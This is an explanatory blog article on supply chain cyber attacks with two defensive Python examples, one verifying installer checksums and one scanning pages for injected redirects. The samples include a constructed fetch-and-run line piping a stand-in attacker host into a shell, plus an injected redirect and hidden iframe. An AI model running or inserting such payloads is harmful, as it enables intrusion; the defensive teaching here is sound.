What is a Supply Chain Attack?
Most growing businesses work with a variety of partners and third-party vendors in a number of different ways. Exchanging large amounts of data with those partners (integrations, customer details and so on) increases the security risk. In a supply chain, a deliberate cyber attack, usually involving malware, can reach any business in the chain through one of many vulnerable access points.
The global management consultancy Accenture recently released a report stating that over half of cyber attacks are delivered through the supply chain, and claiming that over 60% of cyber attacks originate either from entities that are part of the extended supply chain or from external parties exploiting security vulnerabilities within the chain itself.
It is important to note that a supply chain is only as secure as its weakest member: cyber criminals identify the vulnerabilities of that weakest member and use them to gain access to the other members of the chain.
These are worrying statistics for UK businesses now that the GDPR is in force. Under the GDPR, a Supply Chain Attack that results in a personal data breach could leave a business liable to a fine of up to 4% of annual worldwide turnover (or €20 million, whichever is higher).
How are supply chains attacked?
Supply Chain Attacks commonly arrive through third-party software providers, third-party data storage, compromised websites and watering holes, all of which can be used to distribute malware. We briefly explore each method below.
Third party software providers
Attacks occur when malware or counterfeit components are embedded in software held in repositories that businesses regard as secure. Users download the software, and installing it installs the malware along with it. Because software altered at the source is very hard to tell apart from the genuine article, security teams have few clues to suspect it is not legitimate. This year's Petya (NotPetya) ransomware outbreak, which spread from a compromised software update, hit businesses around the world.
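One practical check against a tampered download is to pin the expected digest of each artefact and refuse to install anything that does not match. The example below is added here and is not code from the original article or from any vendor: it parses a sha256sum-style checksum list, verifies a downloaded installer against it, and shows a genuine build passing while a copy with one injected line is rejected. The package name, the installer contents and the "published" checksum list are all constructed for the demonstration. The important caveat is that the pinned hash must reach you over a channel separate from the download itself (a signed release note, a hash file fetched separately, a value recorded when the build was first vetted); a hash read from the same repository an attacker has altered proves nothing.

```python
import hashlib
import hmac
import re

# Constructed sample artefacts (not real vendor files): a known-good installer and a
# copy with one extra line that pulls down and runs a remote payload.
GENUINE_BUILD = b"#!/bin/sh\necho 'installing widget 1.2.3'\n"
TAMPERED_BUILD = GENUINE_BUILD + b"curl -s http://attacker.invalid/stage2 | sh\n"


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_sha256sums(text: str) -> dict:
    """Parse sha256sum-style lines ('<hex>  <file>' or '<hex> *<file>') into {file: hex}."""
    manifest = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s+\*?", line, maxsplit=1)
        if len(parts) != 2 or not re.fullmatch(r"[0-9a-fA-F]{64}", parts[0]):
            raise ValueError(f"malformed checksum line: {line!r}")
        manifest[parts[1]] = parts[0].lower()
    return manifest


# In practice this text comes from the vendor over a channel separate from the
# download; for this offline demo it is derived from the known-good bytes above.
PUBLISHED_SHA256SUMS = (
    "# widget 1.2.3 release checksums (constructed for this example)\n"
    f"{sha256_hex(GENUINE_BUILD)}  widget-installer-1.2.3.sh\n"
)
PINNED_MANIFEST = parse_sha256sums(PUBLISHED_SHA256SUMS)


def verify_artifact(name: str, data: bytes, manifest=PINNED_MANIFEST) -> bool:
    """True only if `name` is pinned and `data` hashes to the pinned digest."""
    expected = manifest.get(name)
    if expected is None:
        return False  # unknown artefact: refuse rather than trust the repository
    # Constant-time comparison so a mismatch leaks nothing about how close it was.
    return hmac.compare_digest(sha256_hex(data), expected)


def install_decision(name: str, data: bytes, manifest=PINNED_MANIFEST) -> str:
    return "install" if verify_artifact(name, data, manifest) else "reject"


if __name__ == "__main__":
    for label, blob in (("genuine", GENUINE_BUILD), ("tampered", TAMPERED_BUILD)):
        print(label, sha256_hex(blob)[:16], install_decision("widget-installer-1.2.3.sh", blob))
```

A size check or a filename check would pass the tampered build just as readily as the genuine one; only a digest pinned out of band distinguishes them, and an artefact that is absent from the manifest is treated as untrusted rather than as "probably fine".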
Third party data storage
Many businesses store their data with third-party companies that aggregate, store and process it. Some data storage providers are not fully secure and can be targeted by cyber criminals, who can then use the stolen data to commit large-scale fraud against other links in the supply chain.
Websites
Cyber criminals can easily compromise insecure websites and add redirect scripts that send visitors to a malicious domain, where malware is downloaded automatically (a drive-by download). This could be the website of one of your third-party providers, which would then infect your business when your staff or clients visit it.
Watering holes
In a watering hole Supply Chain Attack, cyber criminals identify a website that their target group visits heavily (e.g. government, finance or healthcare sites). Once the site is hacked they use it as a base to distribute malware, which can infect visitors' devices and, from there, the networks those devices connect to.
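Both the injected-redirect and watering-hole cases above leave a trace in the compromised page itself: a script, iframe or meta refresh that sends the browser to a host the site never used before. The example below is added here and is not code from the original article: it scans a page's HTML against an allowlist of hosts the site is expected to load content from, and flags inline redirects (`location = ...`, `location.href = ...`, `location.replace(...)`), foreign `<script src>` and `<iframe src>` references, and meta-refresh targets pointing elsewhere. The vendor portal page, the allowlisted hosts and the `.invalid` attacker domain are all constructed for the demonstration; a real check would run the same scan on a periodic fetch of each supplier site your staff rely on and alert on new findings.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the vendor page is expected to load content from (hypothetical names).
TRUSTED_HOSTS = {"vendor.example", "cdn.vendor.example"}

# Inline-script statements that send the browser elsewhere:
#   location = "..."   window.location.href = "..."   location.replace("...")
REDIRECT_RE = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*['"]([^'"]+)['"]"""
    r"""|location\.replace\(\s*['"]([^'"]+)['"]\s*\)"""
)


class RedirectScanner(HTMLParser):
    """Collects script, iframe and meta-refresh references to hosts outside the allowlist."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = {h.lower() for h in trusted_hosts}
        self.findings = []
        self._in_script = False

    def _untrusted(self, url):
        host = urlparse(url or "").hostname
        # Relative URLs have no host and are same-origin; only foreign hosts count.
        return host is not None and host.lower() not in self.trusted

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "script":
            self._in_script = True
            if self._untrusted(a.get("src")):
                self.findings.append(f"external script: {a['src']}")
        elif tag == "iframe" and self._untrusted(a.get("src")):
            self.findings.append(f"foreign iframe: {a['src']}")
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s]+)", a.get("content", ""), re.I)
            if m and self._untrusted(m.group(1)):
                self.findings.append(f"meta refresh: {m.group(1)}")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            return
        for m in REDIRECT_RE.finditer(data):
            url = m.group(1) or m.group(2)
            if self._untrusted(url):
                self.findings.append(f"inline redirect: {url}")


def scan_page(html: str, trusted_hosts=TRUSTED_HOSTS) -> list:
    scanner = RedirectScanner(trusted_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a vendor portal page after an attacker has injected a
# meta refresh, an inline redirect and a hidden iframe, all pointing at a .invalid host.
COMPROMISED_PAGE = """<html><head>
<title>Acme Vendor Portal</title>
<meta http-equiv="refresh" content="5; url=http://malicious.invalid/landing">
<script src="https://cdn.vendor.example/app.js"></script>
<script>
  /* injected */ window.location = "http://malicious.invalid/update.exe";
</script>
</head><body>
<iframe src="http://malicious.invalid/drop" width="0" height="0" style="display:none"></iframe>
<p>Welcome to the portal.</p>
</body></html>"""

# Constructed sample: the same page before the compromise (reads location, never sets it).
CLEAN_PAGE = """<html><head>
<title>Acme Vendor Portal</title>
<script src="https://cdn.vendor.example/app.js"></script>
<script>var ref = location.href; document.title = "Portal (" + ref + ")";</script>
</head><body><p>Welcome to the portal.</p></body></html>"""


if __name__ == "__main__":
    for finding in scan_page(COMPROMISED_PAGE):
        print(finding)
    print("clean page findings:", scan_page(CLEAN_PAGE))
```

The allowlist is what makes the scan useful: a script that merely reads `location.href` is ignored, while any assignment or redirect to a host outside the list is reported, so a newly added attacker domain stands out even when the rest of the page is unchanged.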
Preventing a Supply Chain Attack
The more steps each business takes to improve its own security, the more secure the whole supply chain becomes. Here are a few things you can do to improve the security of your business, and some questions to ask your partners within the supply chain. Complex supply chains, such as those in manufacturing, require comprehensive risk management processes on top of these basics.
- Build security declarations into vendor and supplier agreements – Although suppliers are not employees, you share important information and data with them, very often over email. While you may be able to trust your own security set-up, can you rely on someone else's? A data security policy should be part of every supplier agreement.
- Use endpoint protection for devices – ensure that staff only use devices that have been checked and approved. Intercept X from Sophos offers full endpoint protection.
- Staff awareness – provide cyber security training to all staff so that every employee can understand and identify possible threats, and train staff not to keep passwords or private data in personal folders on their computers. Obtaining the Cyber Essentials certification is a good way to get your business started.
- Encryption – make sure all business hard drives are encrypted, so that a lost or stolen device does not expose the data on it.
- Update – ensure automatic updates are turned on across the business to reduce the risk of running unsupported or out-of-date systems that hold known vulnerabilities.
- Back up – ensure your business has a secure disaster recovery and backup service in place, and that any partners with access to your business data do too.
Photo credits https://www.ncsc.gov.uk/